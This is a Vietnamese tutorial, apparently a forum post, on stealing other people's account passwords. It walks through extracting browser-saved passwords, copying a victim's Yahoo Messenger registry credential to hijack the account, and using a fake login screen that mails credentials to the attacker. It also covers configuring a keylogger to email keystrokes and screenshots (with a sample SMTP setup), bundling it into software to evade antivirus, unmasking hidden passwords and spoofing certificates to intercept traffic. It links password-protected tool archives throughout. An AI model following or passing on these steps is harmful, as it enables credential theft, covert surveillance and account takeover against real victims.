I - Exploit password được lưu lại trên các trình duyệt
Hacker thường lợi dụng thói quen của người dùng thường lưu lại password các tài khoản trên trình duyệt để lần sau đăng nhập dễ hơn. Khi có quyền điều máy tính của victim, password có thể bị lấy như sau:
-Đối với firefox password được lưu lại theo đường dẫn:
tool -> options ->security -> save passwords-> show password
-Đối với IE hoặc chrome (cả firefox nữa) ta có thể dùng tool sau:
http://www.mediafire.com/?mj1mm8gx07m1db0(pass dải nén: ducdung.08clc)
II - Password yahoo messenger được lưu lại:
Bạn vào run: regedit
Sau đó vào theo đường dẫn:HKEY_CURRENT_USER -> software -> yahoo ->paper
Click vào “paper”, bạn nhìn sang khung bên trái , ở cột name, bạn chú ý 2 mục có tên: “ETS” và “Yahoo! User ID”. Ta sang bên cột data()
ETS : chính là password ở dạng mã hóa
Yahoo! User ID: Chính là nickname yahoo
Vậy ta có thể làm được gì: Hình thức mã hóa với phiên bản beta 11 tôi chưa giải mã được.
Nhưng nếu coppy đoạn mã hóa password (ETS) từ máy của victim rồi thay vào máy của mình và thay cả nickname yahoo của victim vào “ Yahoo! User ID”, thì lúc khởi động, nickname của victim sẽ đăng nhập tự đông trên máy của mình.
III - Sử Dụng Phần Mền Face Login:
Hacker sẽ sử dụng phần mền tạo ra một giao diện đăng nhập y hệt như “Yahoo Messenge”, rồi bằng cách nào đó đưa vào máy tính của victim. Khi victim đăng nhập vào nick chat, thì toàn bộ ID và pass sẽ được gửi về mail của hacker đã được thiết lập từ trước.
Link download:
http://www.mediafire.com/?460dma29svhpd93Tut hướng dẫn sử dụng:
www.mediafire.com/?n7fc1o2nko9ardrIV- Sử dụng phần mền gián điệp keylogger:
Đó là hình thức ghi lại mọi hoạt động trên bàn phím của victim sau đó gửi về mail của hacker
Trong quá trình sử dụng, tôi thích nhất là perfect keylogger
Chức năng: Ghi lại mọi thao tác bàn phím,những website đã vào, chụp ảnh màn hình destop rồi gửi về mail của hacker
Cách sử dụng: Bạn có thể search trên google. Riêng có 1 điểm cần lưu ý, đó là khi thiết lập địa chỉ mail gửi về bạn nên chọn mail aol
Ví dụ cấu hình mail:
send to:
ducdung123@aol.comSmtp: smtp.aol.com
Username: ducdung123
Password: ***********
Key perfect logger có 2 phiên bản 1.68 và 1.75. Điểm khác nhau:
1.68: có khả năng tạo tao ra virus (Chính là con keylogger mà hacker đã thiết lập) và đính kèm vào phần mền. Khi người dùng cài phần mền đó thì keylogger cũng vô tình cũng cài trên máy đó luôn.
Link download full:
http://www.mediafire.com/?kg9t69t02b72gbx(pass: ducdung.08clc)
1.75: Mạnh hơn 1.68 có thể qua mặt nhiều phần mền antivirus khi nó đã được cài đặt trên máy tính victim. Nhưng không có khả năng tạo virus đính kèm vào phần mền như 1.68
Link download full:
http://www.mediafire.com/?86h81b4961w4ib4( pass:ducdung.08clc)
Vi deo hướng dẫn sử dụng:
Link download:
http://www.mediafire.com/?sswzmqhapmfxfh4V - Giải mã ký tự password bị ẩn dưới dạng : *******
Vô tình bạn thấy password gmail hay yahoo của victim ở dạng ***** nó đã bị ẩn đi và bạn muốn đọc các ký tự đó:
Link down load:
http://www.mediafire.com/?0qxzsk30k0izi0f(pass dải nén: ducdung.08clc)
Tool này có thể sử dụng đối với tất cả các loại password với mọi phiên bản.
VI- Sử dụng kỹ thuật giả mạo certificate:
Đây là một kỹ thuậtrất hay, sử dụng hướng luồng thông tin đi qua cổng proxy đã được thiết lâp trên máy của hacker. Chính vì vậy hacker sẽ có toàn bộ thông tin của victim được gửi trên internet bao gồm cả những thông tin nhạy cảm.
Kỹ thuât này do anh “tocbatdat – giảng viên CEH trung tâm I-TRAIN” viết
Link download toàn bộ tool và tài liệu hướng dẫn:
http://www.mediafire.com/?zhw99ufbem6geaq(Password giải nén: ducdung.08clc)
Bao gồm: ) burp suite v1.3
) Quick_Batch_File_Compiler_3.21
) Java bổ trợ
) Đoạn mã thiết lập proxy tự động trên giao diện IE
)Tài liệu hướng dẫn chi tiết được viết bởi anh tocbatdat